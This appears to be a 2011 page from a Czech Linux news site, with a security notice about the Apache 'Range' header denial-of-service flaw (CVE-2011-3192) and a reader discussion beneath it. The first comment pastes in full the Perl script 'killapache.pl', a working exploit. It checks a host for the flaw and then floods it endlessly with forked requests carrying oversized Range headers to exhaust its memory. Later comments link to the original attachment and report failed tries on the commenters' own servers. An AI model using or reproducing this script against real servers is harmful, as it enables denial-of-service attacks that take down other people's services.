abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    včera 22:33 | Nová verze

    Byla vydána beta verze openSUSE Leap 16. Ve výchozím nastavení s novým instalátorem Agama.

    Ladislav Hagara | Komentářů: 0
    včera 17:44 | Zajímavý článek

    Devadesátková hra Brány Skeldalu prošla portací a je dostupná na platformě Steam. Vyšel i parádní blog autora o portaci na moderní systémy a platformy včetně Linuxu.

    karkar | Komentářů: 0
    včera 12:11 | Humor

    Lidi dělají divné věci. Například spouští Linux v Excelu. Využít je emulátor RISC-V mini-rv32ima sestavený jako knihovna DLL, která je volaná z makra VBA (Visual Basic for Applications).

    Ladislav Hagara | Komentářů: 2
    včera 10:44 | IT novinky

    Revolut nabídne neomezený mobilní tarif za 12,50 eur (312 Kč). Aktuálně startuje ve Velké Británii a Německu.

    Ladislav Hagara | Komentářů: 23
    včera 09:55 | IT novinky

    Společnost Amazon miliardáře Jeffa Bezose vypustila na oběžnou dráhu první várku družic svého projektu Kuiper, který má z vesmíru poskytovat vysokorychlostní internetové připojení po celém světě a snažit se konkurovat nyní dominantnímu Starlinku nejbohatšího muže planety Elona Muska.

    Ladislav Hagara | Komentářů: 2
    včera 09:33 | IT novinky

    Poslední aktualizací začal model GPT-4o uživatelům příliš podlézat. OpenAI jej tak vrátila k předchozí verzi.

    Ladislav Hagara | Komentářů: 0
    včera 08:11 | Nová verze

    Google Chrome 136 byl prohlášen za stabilní. Nejnovější stabilní verze 136.0.7103.59 přináší řadu novinek z hlediska uživatelů i vývojářů. Podrobný přehled v poznámkách k vydání. Opraveno bylo 8 bezpečnostních chyb. Vylepšeny byly také nástroje pro vývojáře.

    Ladislav Hagara | Komentářů: 0
    29.4. 20:55 | Nová verze

    Homebrew (Wikipedie), správce balíčků pro macOS a od verze 2.0.0 také pro Linux, byl vydán ve verzi 4.5.0. Na stránce Homebrew Formulae lze procházet seznamem balíčků. K dispozici jsou také různé statistiky.

    Ladislav Hagara | Komentářů: 0
    29.4. 16:22 | Nová verze

    Byl vydán Mozilla Firefox 138.0. Přehled novinek v poznámkách k vydání a poznámkách k vydání pro vývojáře. Řešeny jsou rovněž bezpečnostní chyby. Nový Firefox 138 je již k dispozici také na Flathubu a Snapcraftu.

    Ladislav Hagara | Komentářů: 0
    29.4. 15:55 | Pozvánky

    Šestnáctý ročník ne-konference jOpenSpace se koná 3. – 5. října 2025 v Hotelu Antoň v Telči. Pro účast je potřeba vyplnit registrační formulář. Ne-konference neznamená, že se organizátorům nechce připravovat program, ale naopak dává prostor všem pozvaným, aby si program sami složili z toho nejzajímavějšího, čím se v poslední době zabývají nebo co je oslovilo. Obsah, který vytvářejí všichni účastníci, se skládá z desetiminutových

    … více »
    Zdenek H. | Komentářů: 2
    Jaký filesystém primárně používáte?
     (58%)
     (1%)
     (9%)
     (21%)
     (4%)
     (1%)
     (2%)
     (0%)
     (1%)
     (3%)
    Celkem 495 hlasů
     Komentářů: 19, poslední včera 11:32
    Rozcestník

    DoS zranitelnost webového serveru Apache

    Byla objevena DoS zranitelnost webového serveru Apache (Range header DoS vulnerability Apache HTTPD 1.3/2.x, CVE-2011-3192, Bugtraq ID: 49303). V oficiálním bezpečnostním upozornění se uvádí 5 doporučení pro zmírnění dopadů útoků. Oficiální bezpečnostní záplata nebo nová verze webového serveru bude vydána do 48 hodin.

    25.8.2011 19:20 | Ladislav Hagara | Bezpečnostní upozornění


    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    25.8.2011 21:39 NN
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    #By Kingcope
    #Year 2011
    #
    # Will result in swapping memory to filesystem on the remote side
    # plus killing of processes when running out of swap space.
    # Remote System becomes unstable.
    #
    
    use IO::Socket;
    use Parallel::ForkManager;
    
    sub usage {
    	print "Apache Remote Denial of Service (memory exhaustion)\n";
    	print "by Kingcope\n";
    	print "usage: perl killapache.pl <host> [numforks]\n";
    	print "example: perl killapache.pl www.example.com 50\n";
    }
    
    sub killapache {
    print "ATTACKING $ARGV[0] [using $numforks forks]\n";
    =09
    $pm =3D new Parallel::ForkManager($numforks);
    
    $|=3D1;
    srand(time());
    $p =3D "";
    for ($k=3D0;$k<1300;$k++) {
    	$p .=3D ",5-$k";
    }
    
    for ($k=3D0;$k<$numforks;$k++) {
    my $pid =3D $pm->start and next; =09
    =09
    $x =3D "";
    my $sock =3D IO::Socket::INET->new(PeerAddr =3D> $ARGV[0],
                                     PeerPort =3D> "80",
                         			 Proto    =3D> 'tcp');
    
    $p =3D "HEAD / HTTP/1.1\r\nHost: =
    $ARGV[0]\r\nRange:bytes=3D0-$p\r\nAccept-Encoding: gzip\r\nConnection: =
    close\r\n\r\n";
    print $sock $p;
    
    while(<$sock>) {
    }
     $pm->finish;
    }
    $pm->wait_all_children;
    print ":pPpPpppPpPPppPpppPp\n";
    }
    
    sub testapache {
    my $sock =3D IO::Socket::INET->new(PeerAddr =3D> $ARGV[0],
                                     PeerPort =3D> "80",
                         			 Proto    =3D> 'tcp');
    
    $p =3D "HEAD / HTTP/1.1\r\nHost: =
    $ARGV[0]\r\nRange:bytes=3D0-$p\r\nAccept-Encoding: gzip\r\nConnection: =
    close\r\n\r\n";
    print $sock $p;
    
    $x =3D <$sock>;
    if ($x =3D~ /Partial/) {
    	print "host seems vuln\n";
    	return 1;=09
    } else {
    	return 0;=09
    }
    }
    
    if ($#ARGV < 0) {
    	usage;
    	exit;=09
    }
    
    if ($#ARGV > 1) {
    	$numforks =3D $ARGV[1];
    } else {$numforks =3D 50;}
    
    $v =3D testapache();
    if ($v =3D=3D 0) {
    	print "Host does not seem vulnerable\n";
    	exit;=09
    }
    while(1) {
    killapache();
    }
    
    NN
    25.8.2011 21:43 NN
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110820/848b4dca/attachment.obj
    25.8.2011 22:09 aa
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Utoci to a... nic sa nedeje. Aspon na mojom serveri.
    MMMMMMMMM avatar 25.8.2011 22:28 MMMMMMMMM | skóre: 44 | blog: unstable | Valašsko :-)
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Host does not seem vulnerable (to vidím zase já, když "útočím" na své servery)
    25.8.2011 22:38 aa
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Skus nejaky vacsi subor, potom to bude posielat po 50 paketoch a nic z toho.
    pepe_ avatar 25.8.2011 22:43 pepe_ | skóre: 48
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru

    A funguje to i s lighttpd/mysql/php5 s cgifixem ?

    26.8.2011 19:07 Ladislav Hagara | skóre: 105 | blog: Ride the Raven
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Aktualizace bezpečnostního upozornění.
    Problémem je nejenom 'Range' header ale také 'Range-Request' header.
    Oficiální bezpečnostní záplata nebo nová verze webového serveru bude vydána snad do 24 hodin.
    Otto Šabart avatar 27.8.2011 01:10 Otto Šabart | skóre: 13 | blog: KatiePC blog
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Exploit vyšel na exploit-db.com už před 8 dny... No zkoušel jsem ho a také mi nefunguje.
    *´¨)¸.·´¨)¸.·***·>>> www.seberm.com

    Založit nové vláknoNahoru


    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.